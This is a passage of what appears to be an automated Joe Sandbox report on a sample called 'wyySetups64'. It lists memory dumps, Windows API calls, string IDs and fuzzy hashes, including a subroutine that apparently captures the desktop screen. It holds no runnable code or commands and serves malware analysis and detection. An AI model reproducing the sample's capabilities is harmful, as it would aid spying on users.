                                                                                                                                                                                                              • Associated: 00000001.00000002.4116886071.0000000000BE5000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              • Associated: 00000001.00000002.4116935852.0000000000BE9000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              • Associated: 00000001.00000002.4116976160.0000000000BEF000.00000020.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              • Associated: 00000001.00000002.4117023604.0000000000BF1000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_bd0000_wyySetups64.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: CreateErrorFreeHeapLastTimerWaitable_free_malloc_memset
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 3340475617-0
                                                                                                                                                                                                              • Opcode ID: fe23c8738aecdda0c74f7913483e1047f9e528227aaf4301a4c221f7863492fb
                                                                                                                                                                                                              • Instruction ID: be59842845832f08a30eb9bb2f2ab2c2bbe945b66f97783102e7022f2f0b3f85
                                                                                                                                                                                                              • Opcode Fuzzy Hash: fe23c8738aecdda0c74f7913483e1047f9e528227aaf4301a4c221f7863492fb
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 4D01C8B5900B449FE3609F7AD881B97FBE8EB85314F10486EE5AE87302D635A9048F60
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • CreateWaitableTimerW.KERNEL32(00000000,00000000,00000000), ref: 03373667
                                                                                                                                                                                                              • _free.LIBCMT ref: 0337369C
                                                                                                                                                                                                                • Part of subcall function 0337F639: RtlFreeHeap.NTDLL(00000000,00000000,?,03383E4C,00000000,?,03384500,00000000,00000001,00000000,?,03388DE6,00000018,03396448,0000000C,03388E76), ref: 0337F64F
                                                                                                                                                                                                                • Part of subcall function 0337F639: GetLastError.KERNEL32(00000000,?,03383E4C,00000000,?,03384500,00000000,00000001,00000000,?,03388DE6,00000018,03396448,0000000C,03388E76,00000000), ref: 0337F661
                                                                                                                                                                                                              • _malloc.LIBCMT ref: 033736D7
                                                                                                                                                                                                              • _memset.LIBCMT ref: 033736E5
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000001.00000002.4120084885.0000000003370000.00000040.00001000.00020000.00000000.sdmp, Offset: 03370000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000001.00000002.4120084885.00000000033A4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_3370000_wyySetups64.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: CreateErrorFreeHeapLastTimerWaitable_free_malloc_memset
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 3340475617-0
                                                                                                                                                                                                              • Opcode ID: b8ce50eb5aec77447df49473cd7e8ca4a5284579f7211c3c57fbf4408d14edb2
                                                                                                                                                                                                              • Instruction ID: 3e8514d88f3da56cb416f642f2df6e39c3ea67662d24457fc3fcc33f7011032f
                                                                                                                                                                                                              • Opcode Fuzzy Hash: b8ce50eb5aec77447df49473cd7e8ca4a5284579f7211c3c57fbf4408d14edb2
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 0101C4B5900B04DFE370DF7A98C1B97BAE9FB85214F14482EE5AE87301D635A8058F60
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • _malloc.LIBCMT ref: 031FF0E0
                                                                                                                                                                                                                • Part of subcall function 031FF032: __FF_MSGBANNER.LIBCMT ref: 031FF04B
                                                                                                                                                                                                                • Part of subcall function 031FF032: __NMSG_WRITE.LIBCMT ref: 031FF052
                                                                                                                                                                                                              • std::exception::exception.LIBCMT ref: 031FF115
                                                                                                                                                                                                              • std::exception::exception.LIBCMT ref: 031FF12F
                                                                                                                                                                                                              • __CxxThrowException@8.LIBCMT ref: 031FF140
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000001.00000002.4119630030.00000000031F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 031F0000, based on PE: false
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_31f0000_wyySetups64.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: std::exception::exception$Exception@8Throw_malloc
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 2388904642-0
                                                                                                                                                                                                              • Opcode ID: b08fdf8cb5e3b65abb6e8e2bd981c9ae2de8ac343fbf2f6e0fd6789c4a68690e
                                                                                                                                                                                                              • Instruction ID: 99a796a49e144bb3d41e9e54757bc41baa85c5a55cd863a1d90de2e4b490878c
                                                                                                                                                                                                              • Opcode Fuzzy Hash: b08fdf8cb5e3b65abb6e8e2bd981c9ae2de8ac343fbf2f6e0fd6789c4a68690e
                                                                                                                                                                                                              • Instruction Fuzzy Hash: A4F02D794003157FDB15FB54DC24ABF7BA9DB48644F944069D6009A1D1DBF18A43CB50
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • _malloc.LIBCMT ref: 00B26F08
                                                                                                                                                                                                                • Part of subcall function 00B26E5A: __FF_MSGBANNER.LIBCMT ref: 00B26E73
                                                                                                                                                                                                                • Part of subcall function 00B26E5A: __NMSG_WRITE.LIBCMT ref: 00B26E7A
                                                                                                                                                                                                              • std::exception::exception.LIBCMT ref: 00B26F3D
                                                                                                                                                                                                              • std::exception::exception.LIBCMT ref: 00B26F57
                                                                                                                                                                                                              • __CxxThrowException@8.LIBCMT ref: 00B26F68
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000001.00000002.4116355062.0000000000B20000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B20000, based on PE: false
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_b20000_wyySetups64.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: std::exception::exception$Exception@8Throw_malloc
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 2388904642-0
                                                                                                                                                                                                              • Opcode ID: 1e9301e5085f9c58ec7a0ab4f7fc891bb570a668ba91a7db57855d99bd873ef8
                                                                                                                                                                                                              • Instruction ID: a9571a0e2c7d16b19460eb080eaeac8ca88343ca5ae13197b3ca2a44d8ef4c75
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 1e9301e5085f9c58ec7a0ab4f7fc891bb570a668ba91a7db57855d99bd873ef8
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 7DF0F431404279A6DF00EB64EC85AAD3BE5EB41304F1400A8E42C9E0D2DFB1CAC18754
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                • Part of subcall function 00BD1420: HeapFree.KERNEL32(?,00000000,?,?,?,00BD40B1,?,00000000,00BD4039,?,74DEDFA0,00BD3648), ref: 00BD143D
                                                                                                                                                                                                                • Part of subcall function 00BD1420: _free.LIBCMT ref: 00BD1459
                                                                                                                                                                                                              • HeapDestroy.KERNEL32(00000000), ref: 00BD64A3
                                                                                                                                                                                                              • HeapCreate.KERNEL32(?,?,?), ref: 00BD64B5
                                                                                                                                                                                                              • _free.LIBCMT ref: 00BD64C5
                                                                                                                                                                                                              • HeapDestroy.KERNEL32 ref: 00BD64F2
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000001.00000002.4116723964.0000000000BD1000.00000020.00001000.00020000.00000000.sdmp, Offset: 00BD0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000001.00000002.4116694335.0000000000BD0000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              • Associated: 00000001.00000002.4116886071.0000000000BE5000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              • Associated: 00000001.00000002.4116935852.0000000000BE9000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              • Associated: 00000001.00000002.4116976160.0000000000BEF000.00000020.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              • Associated: 00000001.00000002.4117023604.0000000000BF1000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_bd0000_wyySetups64.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Heap$Destroy_free$CreateFree
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 4097506873-0
                                                                                                                                                                                                              • Opcode ID: bc2ef5737f13cc1dca07ff88fb41ad41101f48d96f24059e56ec94eb2252a633
                                                                                                                                                                                                              • Instruction ID: 1d04b57628ed8d8c306f8ce02c1279f842cfbfd84b8eb618e81a1ffc8c2aa876
                                                                                                                                                                                                              • Opcode Fuzzy Hash: bc2ef5737f13cc1dca07ff88fb41ad41101f48d96f24059e56ec94eb2252a633
                                                                                                                                                                                                              • Instruction Fuzzy Hash: D0F037B9500B02ABE7209F25E848B13F7F8FF84714F108519E85987341EB34E851CFA0
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                • Part of subcall function 03371420: HeapFree.KERNEL32(?,00000000,?,?,?,033740B1,?,00000000,03374039,?,74DEDFA0,03373648), ref: 0337143D
                                                                                                                                                                                                                • Part of subcall function 03371420: _free.LIBCMT ref: 03371459
                                                                                                                                                                                                              • HeapDestroy.KERNEL32(00000000), ref: 0337CD93
                                                                                                                                                                                                              • HeapCreate.KERNEL32(?,?,?), ref: 0337CDA5
                                                                                                                                                                                                              • _free.LIBCMT ref: 0337CDB5
                                                                                                                                                                                                              • HeapDestroy.KERNEL32 ref: 0337CDE2
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000001.00000002.4120084885.0000000003370000.00000040.00001000.00020000.00000000.sdmp, Offset: 03370000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000001.00000002.4120084885.00000000033A4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_3370000_wyySetups64.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Heap$Destroy_free$CreateFree
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 4097506873-0
                                                                                                                                                                                                              • Opcode ID: 486bdfacdb72d6492ca5413d72cfc18c2f231149ef5c10e281bb8947273a85e3
                                                                                                                                                                                                              • Instruction ID: 30179390464c8cf0b6f411f64ef20966cc31d837b8671036422129210e4c91ec
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 486bdfacdb72d6492ca5413d72cfc18c2f231149ef5c10e281bb8947273a85e3
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 09F04FB9500B05EBD320DF24E888B57FBB8FF44B10F144919E859CB640D739E851CB90
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • _malloc.LIBCMT ref: 031F997F
                                                                                                                                                                                                                • Part of subcall function 031FF032: __FF_MSGBANNER.LIBCMT ref: 031FF04B
                                                                                                                                                                                                                • Part of subcall function 031FF032: __NMSG_WRITE.LIBCMT ref: 031FF052
                                                                                                                                                                                                              • _memcpy_s.LIBCMT ref: 031F9B42
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000001.00000002.4119630030.00000000031F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 031F0000, based on PE: false
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_31f0000_wyySetups64.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: _malloc_memcpy_s
                                                                                                                                                                                                              • String ID: &
                                                                                                                                                                                                              • API String ID: 3561290194-3042966939
                                                                                                                                                                                                              • Opcode ID: c8a5b5b6493a3e00500570122ab972c2785b00225f4301cae1c49e60748ae0d9
                                                                                                                                                                                                              • Instruction ID: d588f06b8c31bb3fa14b7d4812884b0d6d7d8043eae5ce653cc29eeebf797a24
                                                                                                                                                                                                              • Opcode Fuzzy Hash: c8a5b5b6493a3e00500570122ab972c2785b00225f4301cae1c49e60748ae0d9
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 6EC15DF1A002199FDB24DF55CCC0BAAB7B8FB4C304F1485A9E709A7251D774AA85CFA4
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000001.00000002.4119630030.00000000031F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 031F0000, based on PE: false
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_31f0000_wyySetups64.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: _memset_wcsrchr
                                                                                                                                                                                                              • String ID: D
                                                                                                                                                                                                              • API String ID: 1675014779-2746444292
                                                                                                                                                                                                              • Opcode ID: 9448fe74a29e6cb94ba3ba7ffaf0542041cc64757f3c043286b2e5ea21082185
                                                                                                                                                                                                              • Instruction ID: 1af3cc4063c4e8490de7cd1a3f131b2e139db85a5af26bf96a3c244f4901446b
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 9448fe74a29e6cb94ba3ba7ffaf0542041cc64757f3c043286b2e5ea21082185
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 0B3109729402187BE724D7A49C89FFF776CEB48710F140124FB0A9A1C1DB715946C7E5
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                • Part of subcall function 0337BC70: GetDesktopWindow.USER32 ref: 0337BC8F
                                                                                                                                                                                                                • Part of subcall function 0337BC70: GetDC.USER32(00000000), ref: 0337BC9C
                                                                                                                                                                                                                • Part of subcall function 0337BC70: CreateCompatibleDC.GDI32(00000000), ref: 0337BCA2
                                                                                                                                                                                                                • Part of subcall function 0337BC70: GetDC.USER32(00000000), ref: 0337BCAD
                                                                                                                                                                                                                • Part of subcall function 0337BC70: GetDeviceCaps.GDI32(00000000,00000008), ref: 0337BCBA
                                                                                                                                                                                                                • Part of subcall function 0337BC70: GetDeviceCaps.GDI32(00000000,00000076), ref: 0337BCC2
                                                                                                                                                                                                                • Part of subcall function 0337BC70: ReleaseDC.USER32(00000000,00000000), ref: 0337BCD3
                                                                                                                                                                                                                • Part of subcall function 0337BC70: GetSystemMetrics.USER32(0000004C), ref: 0337BD78
                                                                                                                                                                                                                • Part of subcall function 0337BC70: GetSystemMetrics.USER32(0000004D), ref: 0337BD8D
                                                                                                                                                                                                                • Part of subcall function 0337BC70: CreateCompatibleBitmap.GDI32(?,?,00000000), ref: 0337BDA6
                                                                                                                                                                                                                • Part of subcall function 0337BC70: SelectObject.GDI32(?,00000000), ref: 0337BDB4
                                                                                                                                                                                                                • Part of subcall function 0337BC70: SetStretchBltMode.GDI32(?,00000003), ref: 0337BDC0
                                                                                                                                                                                                                • Part of subcall function 0337BC70: GetSystemMetrics.USER32(0000004F), ref: 0337BDCD
                                                                                                                                                                                                                • Part of subcall function 0337BC70: GetSystemMetrics.USER32(0000004E), ref: 0337BDE0
                                                                                                                                                                                                                • Part of subcall function 0337F707: _malloc.LIBCMT ref: 0337F721
                                                                                                                                                                                                              • _memset.LIBCMT ref: 0337B1E1
                                                                                                                                                                                                              • swprintf.LIBCMT ref: 0337B204
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000001.00000002.4120084885.0000000003370000.00000040.00001000.00020000.00000000.sdmp, Offset: 03370000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000001.00000002.4120084885.00000000033A4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_3370000_wyySetups64.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: MetricsSystem$CapsCompatibleCreateDevice$BitmapDesktopModeObjectReleaseSelectStretchWindow_malloc_memsetswprintf
                                                                                                                                                                                                              • String ID: %s %s
                                                                                                                                                                                                              • API String ID: 1028806752-581060391
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • std::_Xinvalid_argument.LIBCPMT ref: 03379115
                                                                                                                                                                                                                • Part of subcall function 0337EF39: std::exception::exception.LIBCMT ref: 0337EF4E
                                                                                                                                                                                                                • Part of subcall function 0337EF39: __CxxThrowException@8.LIBCMT ref: 0337EF63
                                                                                                                                                                                                                • Part of subcall function 0337EF39: std::exception::exception.LIBCMT ref: 0337EF74
                                                                                                                                                                                                              • std::_Xinvalid_argument.LIBCPMT ref: 03379128
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000001.00000002.4120084885.0000000003370000.00000040.00001000.00020000.00000000.sdmp, Offset: 03370000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000001.00000002.4120084885.00000000033A4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_3370000_wyySetups64.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Xinvalid_argumentstd::_std::exception::exception$Exception@8Throw
                                                                                                                                                                                                              • String ID: string too long
                                                                                                                                                                                                              • API String ID: 963545896-2556327735
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • __CxxThrowException@8.LIBCMT ref: 0337941D
                                                                                                                                                                                                              • std::_Xinvalid_argument.LIBCPMT ref: 0337944A
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              • invalid string position, xrefs: 03379445
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000001.00000002.4120084885.0000000003370000.00000040.00001000.00020000.00000000.sdmp, Offset: 03370000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000001.00000002.4120084885.00000000033A4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_3370000_wyySetups64.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Exception@8ThrowXinvalid_argumentstd::_
                                                                                                                                                                                                              • String ID: invalid string position
                                                                                                                                                                                                              • API String ID: 3614006799-1799206989
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • __output_l.LIBCMT ref: 031FF1D4
                                                                                                                                                                                                                • Part of subcall function 031FF2DA: __getptd_noexit.LIBCMT ref: 031FF2DA
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000001.00000002.4119630030.00000000031F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 031F0000, based on PE: false
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_31f0000_wyySetups64.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: __getptd_noexit__output_l
                                                                                                                                                                                                              • String ID: B
                                                                                                                                                                                                              • API String ID: 2141734944-1255198513
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • __output_l.LIBCMT ref: 00B26FFC
                                                                                                                                                                                                                • Part of subcall function 00B270E4: __getptd_noexit.LIBCMT ref: 00B270E4
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000001.00000002.4116355062.0000000000B20000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B20000, based on PE: false
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_b20000_wyySetups64.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: __getptd_noexit__output_l
                                                                                                                                                                                                              • String ID: B
                                                                                                                                                                                                              • API String ID: 2141734944-1255198513
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • std::_Xinvalid_argument.LIBCPMT ref: 0337957F
                                                                                                                                                                                                                • Part of subcall function 0337EF86: std::exception::exception.LIBCMT ref: 0337EF9B
                                                                                                                                                                                                                • Part of subcall function 0337EF86: __CxxThrowException@8.LIBCMT ref: 0337EFB0
                                                                                                                                                                                                                • Part of subcall function 0337EF86: std::exception::exception.LIBCMT ref: 0337EFC1
                                                                                                                                                                                                              • _memmove.LIBCMT ref: 033795B5
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              • invalid string position, xrefs: 0337957A
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000001.00000002.4120084885.0000000003370000.00000040.00001000.00020000.00000000.sdmp, Offset: 03370000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000001.00000002.4120084885.00000000033A4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_3370000_wyySetups64.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: std::exception::exception$Exception@8ThrowXinvalid_argument_memmovestd::_
                                                                                                                                                                                                              • String ID: invalid string position
                                                                                                                                                                                                              • API String ID: 1785806476-1799206989
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • std::_Xinvalid_argument.LIBCPMT ref: 0337D1D4
                                                                                                                                                                                                                • Part of subcall function 0337EF39: std::exception::exception.LIBCMT ref: 0337EF4E
                                                                                                                                                                                                                • Part of subcall function 0337EF39: __CxxThrowException@8.LIBCMT ref: 0337EF63
                                                                                                                                                                                                                • Part of subcall function 0337EF39: std::exception::exception.LIBCMT ref: 0337EF74
                                                                                                                                                                                                              • _memmove.LIBCMT ref: 0337D20D
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000001.00000002.4120084885.0000000003370000.00000040.00001000.00020000.00000000.sdmp, Offset: 03370000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000001.00000002.4120084885.00000000033A4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_3370000_wyySetups64.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: std::exception::exception$Exception@8ThrowXinvalid_argument_memmovestd::_
                                                                                                                                                                                                              • String ID: vector<T> too long
                                                                                                                                                                                                              • API String ID: 1785806476-3788999226
                                                                                                                                                                                                              • Opcode ID: 5e08fb12126b45a7a5d89626b0289a3c9ed07cc8e99753a4e7f08ba83f742afb
                                                                                                                                                                                                              • Instruction ID: 6290e06831e5d6a3b2caaf3b52127a4f641c694e54a680ba1c3a534f987df871
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 5e08fb12126b45a7a5d89626b0289a3c9ed07cc8e99753a4e7f08ba83f742afb
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 3F01D876E006119FC710EE6DECC1C2E779CEA403D0F49032AEC12D7618E774E8158790
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • std::_Xinvalid_argument.LIBCPMT ref: 03378443
                                                                                                                                                                                                                • Part of subcall function 0337EF39: std::exception::exception.LIBCMT ref: 0337EF4E
                                                                                                                                                                                                                • Part of subcall function 0337EF39: __CxxThrowException@8.LIBCMT ref: 0337EF63
                                                                                                                                                                                                                • Part of subcall function 0337EF39: std::exception::exception.LIBCMT ref: 0337EF74
                                                                                                                                                                                                              • _memmove.LIBCMT ref: 0337846E
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000001.00000002.4120084885.0000000003370000.00000040.00001000.00020000.00000000.sdmp, Offset: 03370000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000001.00000002.4120084885.00000000033A4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_3370000_wyySetups64.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: std::exception::exception$Exception@8ThrowXinvalid_argument_memmovestd::_
                                                                                                                                                                                                              • String ID: vector<T> too long
                                                                                                                                                                                                              • API String ID: 1785806476-3788999226
                                                                                                                                                                                                              • Opcode ID: 1e3d4425556e70a9284522aa55ace569c0c223cf720445ab0b7829365e36a9fb
                                                                                                                                                                                                              • Instruction ID: b101c2e359eaf9f45bbcd0634a6a9dca8ef4a7c3104ac82b750a6021231d8bfb
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 1e3d4425556e70a9284522aa55ace569c0c223cf720445ab0b7829365e36a9fb
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 5801A2B1A003059FDB34DEA8DCD692BB3D8EF542103184A2DE45ACB740E678F841C761
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000001.00000002.4116355062.0000000000B20000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B20000, based on PE: false
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_b20000_wyySetups64.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: CallFrame@12Setting__getptd
                                                                                                                                                                                                              • String ID: j
                                                                                                                                                                                                              • API String ID: 3454690891-2137352139
                                                                                                                                                                                                              • Opcode ID: 2a3c231524d2f5714940ff7c9f67256147f183406962bf184a7791e03a03933a
                                                                                                                                                                                                              • Instruction ID: 22fa1a9c4ef952915901115b9df0d178554ddd66841ae8587c38225de05b3b4b
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 2a3c231524d2f5714940ff7c9f67256147f183406962bf184a7791e03a03933a
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 19118B71800264EBCB12DF58C4853ADBBF0FF01B24F2481C9E4992B683C3746E92DB91
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                • Part of subcall function 00BE32AE: __getptd.LIBCMT ref: 00BE32B4
                                                                                                                                                                                                                • Part of subcall function 00BE32AE: __getptd.LIBCMT ref: 00BE32C4
                                                                                                                                                                                                              • __getptd.LIBCMT ref: 00BE37D8
                                                                                                                                                                                                                • Part of subcall function 00BD990F: __getptd_noexit.LIBCMT ref: 00BD9912
                                                                                                                                                                                                                • Part of subcall function 00BD990F: __amsg_exit.LIBCMT ref: 00BD991F
                                                                                                                                                                                                              • __getptd.LIBCMT ref: 00BE37E6
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000001.00000002.4116723964.0000000000BD1000.00000020.00001000.00020000.00000000.sdmp, Offset: 00BD0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000001.00000002.4116694335.0000000000BD0000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              • Associated: 00000001.00000002.4116886071.0000000000BE5000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              • Associated: 00000001.00000002.4116935852.0000000000BE9000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              • Associated: 00000001.00000002.4116976160.0000000000BEF000.00000020.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              • Associated: 00000001.00000002.4117023604.0000000000BF1000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_bd0000_wyySetups64.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: __getptd$__amsg_exit__getptd_noexit
                                                                                                                                                                                                              • String ID: csm
                                                                                                                                                                                                              • API String ID: 803148776-1018135373
                                                                                                                                                                                                              • Opcode ID: f0e1e4535676af74e2e30162e3fe80640730f6540ac6db6f2fff18db7859968d
                                                                                                                                                                                                              • Instruction ID: 990f0869ed05cccf66858672050a1cc4b8bd38e02ffa315c718fb20344900b77
                                                                                                                                                                                                              • Opcode Fuzzy Hash: f0e1e4535676af74e2e30162e3fe80640730f6540ac6db6f2fff18db7859968d
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 1D016D368012858BCF349F27C4586ACB3F5EF60B12F5445AEF49057761CB34AB81CB11
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                • Part of subcall function 0339010A: __getptd.LIBCMT ref: 03390110
                                                                                                                                                                                                                • Part of subcall function 0339010A: __getptd.LIBCMT ref: 03390120
                                                                                                                                                                                                              • __getptd.LIBCMT ref: 033906E3
                                                                                                                                                                                                                • Part of subcall function 03383E5B: __getptd_noexit.LIBCMT ref: 03383E5E
                                                                                                                                                                                                                • Part of subcall function 03383E5B: __amsg_exit.LIBCMT ref: 03383E6B
                                                                                                                                                                                                              • __getptd.LIBCMT ref: 033906F1
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000001.00000002.4120084885.0000000003370000.00000040.00001000.00020000.00000000.sdmp, Offset: 03370000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000001.00000002.4120084885.00000000033A4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_3370000_wyySetups64.jbxd
